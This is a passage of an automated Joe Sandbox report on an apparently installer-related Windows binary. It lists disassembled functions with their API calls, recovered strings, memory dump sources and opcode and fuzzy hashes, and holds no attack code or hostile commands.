                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • moneypunct.LIBCPMT ref: 0030EB77
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030EB8E
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030EBAE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 419941038-1316489359
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302D7B
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302D85
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • numpunct.LIBCPMT ref: 00302DBF
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302DD6
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302DF6
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 743221004-1316489359
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,7642E7B1,0000000C,?,00000000,00336A6C,000000FF,?,00322DC1,?,?,00322D95,?), ref: 00322E23
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00322E35
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00336A6C,000000FF,?,00322DC1,?,?,00322D95,?), ref: 00322E57
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: 21$CorExitProcess$mscoree.dll
                                                                                                                                            • API String ID: 4061214504-3298179839
                                                                                                                                            APIs
                                                                                                                                            • EnterCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C58
                                                                                                                                            • LeaveCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C8B
                                                                                                                                            • RtlWakeAllConditionVariable.NTDLL ref: 00312D02
                                                                                                                                            • SetEvent.KERNEL32(?,002F2427,0034E638,00336B40), ref: 00312D0C
                                                                                                                                            • ResetEvent.KERNEL32(?,002F2427,0034E638,00336B40), ref: 00312D18
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 3916383385-1316489359
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FB531
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FB54F
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FB577
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,0000000C,00000000,7642E7B1,?,00000000,00000000), ref: 002FB5CF
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FB6B7
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FB6E1
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3931714976-0
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FB731
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FB74F
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FB777
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,00000000,7642E7B1,?,00000000,00000000), ref: 002FB7CF
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FB863
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FB88D
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3931714976-0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                                                                            • String ID: a/p$am/pm
                                                                                                                                            • API String ID: 3509577899-3206640213
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,76C14450,002F5646,?,?,?,?,?), ref: 002F5898
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast
                                                                                                                                            • String ID: <S4$Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                                                                                            • API String ID: 1452528299-3792586147
                                                                                                                                            • Opcode ID: 1bd93e787f5ec5155a8590ebf47cef9d413cb4c690577584198bda05d19f006d
                                                                                                                                            • Instruction ID: 645add698681bf60276405aae0057b098106224b9a458bd7ebb8998d8f91c4dd
                                                                                                                                            • Opcode Fuzzy Hash: 1bd93e787f5ec5155a8590ebf47cef9d413cb4c690577584198bda05d19f006d
                                                                                                                                            • Instruction Fuzzy Hash: 7C11CE1AE2062A87DB342F6C8800336E2E4DF50794F65087FDA89CB392E6E58CD183D0
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,0031596F,00314900,0031358F), ref: 00315986
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00315994
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003159AD
                                                                                                                                            • SetLastError.KERNEL32(00000000,0031596F,00314900,0031358F), ref: 003159FF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            • Opcode ID: e34fefb5c6871639e2a7269f68f1e5dd4ab8f7e145e269e2293a70e5c21c24ca
                                                                                                                                            • Instruction ID: 6e813929a4aafefcaf977012af02a4128471d490cc54f7b88dcaf41784627be2
                                                                                                                                            • Opcode Fuzzy Hash: e34fefb5c6871639e2a7269f68f1e5dd4ab8f7e145e269e2293a70e5c21c24ca
                                                                                                                                            • Instruction Fuzzy Hash: 9C01D87721EB21DFA6BF2BB57C86ADA2B5CDB4A775B20032AF4148C1F1EF115C815181
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 838279627-1316489359
                                                                                                                                            • Opcode ID: f795058f8e6ae9bc1b0fb4783147f3de85f2a5a68caacad6412fa0417f677c96
                                                                                                                                            • Instruction ID: 88092b232f1f87001e922ce9a01e06b1c6a1ccff28fc5bafa927b598801333d7
                                                                                                                                            • Opcode Fuzzy Hash: f795058f8e6ae9bc1b0fb4783147f3de85f2a5a68caacad6412fa0417f677c96
                                                                                                                                            • Instruction Fuzzy Hash: F8B16CB590124D9FCF16DF98C890AEEBBB9FF48310F144029E805AB291D730AA55CB60
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 838279627-1316489359
                                                                                                                                            • Opcode ID: ea682c2470d44973850f303ee5092108eefbc54089af029ee958dd1de336e068
                                                                                                                                            • Instruction ID: d38b0da992ff61c8c68f67a3c8fed05e10f8688d959acc8401b6046c30f5f3ec
                                                                                                                                            • Opcode Fuzzy Hash: ea682c2470d44973850f303ee5092108eefbc54089af029ee958dd1de336e068
                                                                                                                                            • Instruction Fuzzy Hash: 2BB14A7191024D9FDF11DF94C941AEEFBBAEF08380F14402AE905AB215D770AE66CB64
                                                                                                                                            APIs
                                                                                                                                            • GetTempFileNameW.KERNEL32(?,URL,00000000,?,7642E7B1,?,00000004), ref: 002F3294
                                                                                                                                            • MoveFileW.KERNEL32(?,00000000), ref: 002F354A
                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 002F3592
                                                                                                                                              • Part of subcall function 002F1A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 002F1AF7
                                                                                                                                              • Part of subcall function 002F1A70: LocalFree.KERNEL32(7FFFFFFE), ref: 002F1B7D
                                                                                                                                              • Part of subcall function 002F2E60: LocalFree.KERNEL32(?,7642E7B1,?,?,00333C40,000000FF,?,002F1242,7642E7B1,?,?,00333C75,000000FF), ref: 002F2EB1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                                                                                                            • String ID: URL$url
                                                                                                                                            • API String ID: 853893950-346267919
                                                                                                                                            • Opcode ID: d5b8c86f6b2942188bd9b00dbac6a5f5455326199d4c35002f8ab39967ac7e62
                                                                                                                                            • Instruction ID: 7e41f855df1246416d9a40fdd1811cc0ae79328b98be7b17c7761fa2342cf97c
                                                                                                                                            • Opcode Fuzzy Hash: d5b8c86f6b2942188bd9b00dbac6a5f5455326199d4c35002f8ab39967ac7e62
                                                                                                                                            • Instruction Fuzzy Hash: 6CC16770D2426D9ADB25DF24CC987E9BBB4BF14304F1042E9D409A7291EBB56B98CF90
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 1740715915-1316489359
                                                                                                                                            • Opcode ID: c4c7f6d45945aebe5121979a08fa6d6452fc600284b71bd9f4cf52e97efe3520
                                                                                                                                            • Instruction ID: 2c58f2bb72de0643e5810d6c972c278b84e3d119fea7cd0e78c821ddf637f2ae
                                                                                                                                            • Opcode Fuzzy Hash: c4c7f6d45945aebe5121979a08fa6d6452fc600284b71bd9f4cf52e97efe3520
                                                                                                                                            • Instruction Fuzzy Hash: 6451C4B2605B06DFDB2F8F54D841BEA77A4EF88311F158529E8059B691E731ECC0C790
                                                                                                                                            APIs
                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 002F3735
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00334215,000000FF), ref: 002F381A
                                                                                                                                              • Part of subcall function 002F2310: GetProcessHeap.KERNEL32 ref: 002F2365
                                                                                                                                              • Part of subcall function 002F46F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,002F3778,-00000010,?,?,?,00334215,000000FF), ref: 002F4736
                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 002F37C6
                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00334215,000000FF), ref: 002F37DB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                                                                                            • String ID: ntdll.dll
                                                                                                                                            • API String ID: 3941625479-2227199552
                                                                                                                                            • Opcode ID: 7dda589592918b13ee7a232aef8925e06c46019b1fd6fbf27ea5dee462ba848d
                                                                                                                                            • Instruction ID: cdc8df5c7c10c8a2468d116f059e7114bdc06e5d1e0d30cf5a11ac0ddb4c8ad7
                                                                                                                                            • Opcode Fuzzy Hash: 7dda589592918b13ee7a232aef8925e06c46019b1fd6fbf27ea5dee462ba848d
                                                                                                                                            • Instruction Fuzzy Hash: 9F41A4B1A1060A9FDB14EF68CC45BBEF7E4FF14350F144629EA16D7281EBB4AA14CB50
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0030D3D2
                                                                                                                                              • Part of subcall function 0030254E: __EH_prolog3.LIBCMT ref: 00302555
                                                                                                                                              • Part of subcall function 0030254E: std::_Lockit::_Lockit.LIBCPMT ref: 0030255F
                                                                                                                                              • Part of subcall function 0030254E: std::_Lockit::~_Lockit.LIBCPMT ref: 003025D0
                                                                                                                                            • _Find_elem.LIBCPMT ref: 0030D46E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                            • String ID: 21$%.0Lf$0123456789-
                                                                                                                                            • API String ID: 2544715827-1972204205
                                                                                                                                            • Opcode ID: 582adda944c7a5100f0e179f63401c1aeb4a4cf6e460876231fc43951fce3688
                                                                                                                                            • Instruction ID: 9d291816d6cebe71ab377a9e61d7a9cdc55d13185d079e08bd6234f2cc1805ad
                                                                                                                                            • Opcode Fuzzy Hash: 582adda944c7a5100f0e179f63401c1aeb4a4cf6e460876231fc43951fce3688
                                                                                                                                            • Instruction Fuzzy Hash: F9416D31911218DFCF16DFE4C891ADDBBB5FF08314F100159E801AB296DB70EA56CB91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0030D676
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::_Lockit.LIBCPMT ref: 002F8657
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::_Lockit.LIBCPMT ref: 002F8679
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 002F86A1
                                                                                                                                              • Part of subcall function 002F8610: std::_Lockit::~_Lockit.LIBCPMT ref: 002F880E
                                                                                                                                            • _Find_elem.LIBCPMT ref: 0030D712
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                            • String ID: 21$0123456789-$0123456789-
                                                                                                                                            • API String ID: 3042121994-155559277
                                                                                                                                            • Opcode ID: 86ae86440c6d7f2642ee962f0f5d1dc8a2619dd363d6c37ca644e013a9bb3fd8
                                                                                                                                            • Instruction ID: fb1221e3e1024c47a01fe79725a1f3fb68f6911bd65d09e648768eb1573eb139
                                                                                                                                            • Opcode Fuzzy Hash: 86ae86440c6d7f2642ee962f0f5d1dc8a2619dd363d6c37ca644e013a9bb3fd8
                                                                                                                                            • Instruction Fuzzy Hash: 53417C7191121CDFCF06EFE4C880AEEBBB5BF08350F500069E911AB295DB719A56CF91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00311761
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::_Lockit.LIBCPMT ref: 002F92A0
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::_Lockit.LIBCPMT ref: 002F92C2
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 002F92EA
                                                                                                                                              • Part of subcall function 002F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 002F9422
                                                                                                                                            • _Find_elem.LIBCPMT ref: 003117FB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                            • String ID: 21$0123456789-$0123456789-
                                                                                                                                            • API String ID: 3042121994-155559277
                                                                                                                                            • Opcode ID: 8c31a09abbfc657a830d2e3d98e071c60e3c3a5bc7fc7b9206058029fda20ed7
                                                                                                                                            • Instruction ID: 49c8360ce6a51143a02c024b23ce0d4e9ed19cfcafe225e477adf0eeb7285ff3
                                                                                                                                            • Opcode Fuzzy Hash: 8c31a09abbfc657a830d2e3d98e071c60e3c3a5bc7fc7b9206058029fda20ed7
                                                                                                                                            • Instruction Fuzzy Hash: BC415E3191120DDFCF1ADFA4D881AEEBBB5BF08314F10445AF911AB251DB349A56CF51
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 002F1A20: LocalFree.KERNEL32(?), ref: 002F1A42
                                                                                                                                              • Part of subcall function 00313E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,002F1434,?,?,002FD341,002F1434,00348B5C,?,002F1434,?,00000000), ref: 00313EBA
                                                                                                                                            • GetCurrentProcess.KERNEL32(7642E7B1,7642E7B1,?,?,00000000,00334981,000000FF), ref: 002F62EB
                                                                                                                                              • Part of subcall function 00312C98: EnterCriticalSection.KERNEL32(0034DD3C,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312CA3
                                                                                                                                              • Part of subcall function 00312C98: LeaveCriticalSection.KERNEL32(0034DD3C,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312CE0
                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 002F62B0
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 002F62B7
                                                                                                                                              • Part of subcall function 00312C4E: EnterCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C58
                                                                                                                                              • Part of subcall function 00312C4E: LeaveCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C8B
                                                                                                                                              • Part of subcall function 00312C4E: RtlWakeAllConditionVariable.NTDLL ref: 00312D02
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                                                                                            • String ID: IsWow64Process$kernel32
                                                                                                                                            • API String ID: 1333104975-3789238822
                                                                                                                                            • Opcode ID: 665803782879b6aadfe01105d892d2d1c779b7c5ec024da9282d8958e5da904b
                                                                                                                                            • Instruction ID: 8c683930a882b931ce2033a3889d34761e5e768b92856d9fcc60df2ff7054a38
                                                                                                                                            • Opcode Fuzzy Hash: 665803782879b6aadfe01105d892d2d1c779b7c5ec024da9282d8958e5da904b
                                                                                                                                            • Instruction Fuzzy Hash: 1B2102B2D04319EFCB12DFA4DD46BAEB7A8FB18B50F100225FA119B2D0DB786910CA51
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                            • String ID: $+xv
                                                                                                                                            • API String ID: 2204710431-1686923651
                                                                                                                                            • Opcode ID: 9933ecc51509b06d0949b492301ba7b8b43cb8f3f4ef3a3c08b0d73da0bca993
                                                                                                                                            • Instruction ID: 25f1d08acae7c2d14d36d5cc95ce2d3d5aca223b0fe1de97f7b39eefd198c3ee
                                                                                                                                            • Opcode Fuzzy Hash: 9933ecc51509b06d0949b492301ba7b8b43cb8f3f4ef3a3c08b0d73da0bca993
                                                                                                                                            • Instruction Fuzzy Hash: F221A7B1904B526EDB66DF79C49077BBEF8AB0C300F04495AE499C7A82D734D601CB90
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(7642E7B1,7642E7B1,?,?,00000000,00334981,000000FF), ref: 002F62EB
                                                                                                                                              • Part of subcall function 00312C98: EnterCriticalSection.KERNEL32(0034DD3C,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312CA3
                                                                                                                                              • Part of subcall function 00312C98: LeaveCriticalSection.KERNEL32(0034DD3C,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312CE0
                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 002F62B0
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 002F62B7
                                                                                                                                              • Part of subcall function 00312C4E: EnterCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C58
                                                                                                                                              • Part of subcall function 00312C4E: LeaveCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C8B
                                                                                                                                              • Part of subcall function 00312C4E: RtlWakeAllConditionVariable.NTDLL ref: 00312D02
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                                                                                            • String ID: IsWow64Process$kernel32
                                                                                                                                            • API String ID: 2056477612-3789238822
                                                                                                                                            • Opcode ID: 1d68002bc5bf2c68a792203a02946c1b0f765daf00b2f7c992da3d8d2a7fb27b
                                                                                                                                            • Instruction ID: 0af40bd3ee9421c8eb6a53a3f33c4965fae55b608f09ba71446cf20af3b8bb74
                                                                                                                                            • Opcode Fuzzy Hash: 1d68002bc5bf2c68a792203a02946c1b0f765daf00b2f7c992da3d8d2a7fb27b
                                                                                                                                            • Instruction Fuzzy Hash: 0011D2B6D08719EFCB12CF54DD45BAAB3A8F719B10F00026AED15972C0EB797900CA51
                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00316AA3,?,?,0034DDCC,00000000,?,00316BCE,00000004,InitializeCriticalSectionEx,003397E8,InitializeCriticalSectionEx,00000000), ref: 00316A72
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                            • String ID: api-ms-
                                                                                                                                            • API String ID: 3664257935-2084034818
                                                                                                                                            • Opcode ID: e5a24ab697af91d6018712480cafbf9bec458ecc1978d6b2941aa8570bb602a9
                                                                                                                                            • Instruction ID: 050a7e6012cdda33d142e4f4fbde728b19193cde43bd16a67297e919cbb14be9
                                                                                                                                            • Opcode Fuzzy Hash: e5a24ab697af91d6018712480cafbf9bec458ecc1978d6b2941aa8570bb602a9
                                                                                                                                            • Instruction Fuzzy Hash: 7B11CA72A05225EBCF378BA89C42BD933A89F05770F164150F914FB2C0D770ED4086D5
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302714
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030271E
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030276F
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030278F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
